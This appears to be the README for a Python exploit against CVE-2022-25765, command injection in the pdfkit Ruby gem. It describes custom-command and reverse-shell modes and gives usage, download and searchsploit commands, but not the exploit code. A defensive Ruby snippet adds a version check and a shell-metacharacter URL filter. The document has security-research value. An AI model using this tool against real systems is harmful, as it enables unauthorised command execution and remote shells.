exploit-CVE-2022-25765
Exploit for CVE-2022-25765 (pdfkit) - Command Injection
For educational and authorized security research purposes only.
Exploit Author
@UNICORDev (by @NicPWNs and @Dev-Yeoj)
Vulnerability Description
The package pdfkit from 0.0.0 is vulnerable to Command Injection because the URL it receives is not properly sanitized.
Exploit Description
The Ruby gem pdfkit is commonly used for converting websites or HTML to PDF documents. Vulnerable versions (< 0.8.7.2) of this software can be passed a specially crafted URL containing a command that will be executed. This exploit generates such executable URLs or sends them to a vulnerable website running pdfkit.
Usage
python3 exploit-CVE-2022-25765.py -c <command>
python3 exploit-CVE-2022-25765.py -s <local-IP> <local-port>
python3 exploit-CVE-2022-25765.py -c <command> [-w <http://target.com/index.html> -p <parameter>]
python3 exploit-CVE-2022-25765.py -s <local-IP> <local-port> [-w <http://target.com/index.html> -p <parameter>]
python3 exploit-CVE-2022-25765.py -h
Options
-c Custom command mode. Provide command to generate custom payload with.
-s Reverse shell mode. Provide local IP and port to generate reverse shell payload with.
-w URL of website running vulnerable pdfkit. (Optional)
-p POST parameter on website running vulnerable pdfkit. (Optional)
-h Show this help menu.
Download
Download exploit-CVE-2022-25765.py from GitHub
Download exploit-CVE-2022-25765.py from ExploitDB
Searchsploit (ExploitDB)
searchsploit -u
searchsploit -m 51293
Exploit Requirements
- python3
- python3:requests
- python3:urllib3
Demo
Custom Command Mode
Reverse Shell Sent to Target Website Mode
Tested On
pdfkit Version 0.8.6
Applies To
pdfkit Versions < 0.8.7.2
Test Environment
gem install pdfkit -v 0.8.6
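A defensive counterpart to the Exploit Description above and the affected range under Applies To, added here as an example that is not code from this repository or from the pdfkit gem: a Ruby guard an application can run before handing a user-supplied URL to PDFKit, together with a check of the installed gem version against the fixed release 0.8.7.2. The URL rules (absolute http/https only, no whitespace or shell metacharacters, so multi-parameter query strings are refused by design) and the example.com inputs are this example's own assumptions.

```ruby
# Added defensive example (not part of the exploit repo or the pdfkit gem).
# pdfkit < 0.8.7.2 handed the URL to a shell unsanitized, so this guard refuses
# any input a shell could interpret instead of trying to escape it.
require "rubygems"
require "uri"

FIXED_PDFKIT_VERSION = Gem::Version.new("0.8.7.2")

# True when the given pdfkit version string falls in the affected range (< 0.8.7.2).
def vulnerable_pdfkit_version?(version_string)
  Gem::Version.new(version_string) < FIXED_PDFKIT_VERSION
rescue ArgumentError
  true # an unparsable version is unknown, so treat it as unsafe
end

# Characters a POSIX shell gives special meaning to, plus any whitespace.
# Assumption: the converted page URLs never need these in unencoded form.
SHELL_META = /[\s`$;|&<>()'"\\]/

# True only for a plain absolute http/https URL with a host and no shell-special
# characters; anything else (other schemes, relative paths, bad input) is refused.
def safe_pdf_source_url?(input)
  return false unless input.is_a?(String) && !input.empty?
  return false if input =~ SHELL_META
  uri = URI.parse(input)
  return false unless uri.is_a?(URI::HTTP) # URI::HTTPS is a subclass of URI::HTTP
  !(uri.host.nil? || uri.host.empty?)
rescue URI::InvalidURIError
  false
end

# Policy helper: never run a vulnerable gem version at all, and on any version
# only accept URLs that pass the guard above.
def allow_pdf_conversion?(version_string, url)
  !vulnerable_pdfkit_version?(version_string) && safe_pdf_source_url?(url)
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample inputs, using the reserved example.com domain.
  puts allow_pdf_conversion?("0.8.6", "https://example.com/index.html")   # false: gem vulnerable
  puts allow_pdf_conversion?("0.8.7.2", "https://example.com/index.html") # true
  puts allow_pdf_conversion?("0.8.7.2", "http://example.com/a b")         # false: whitespace in URL
end
```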
Credits
- https://nvd.nist.gov/vuln/detail/CVE-2022-25765
- https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795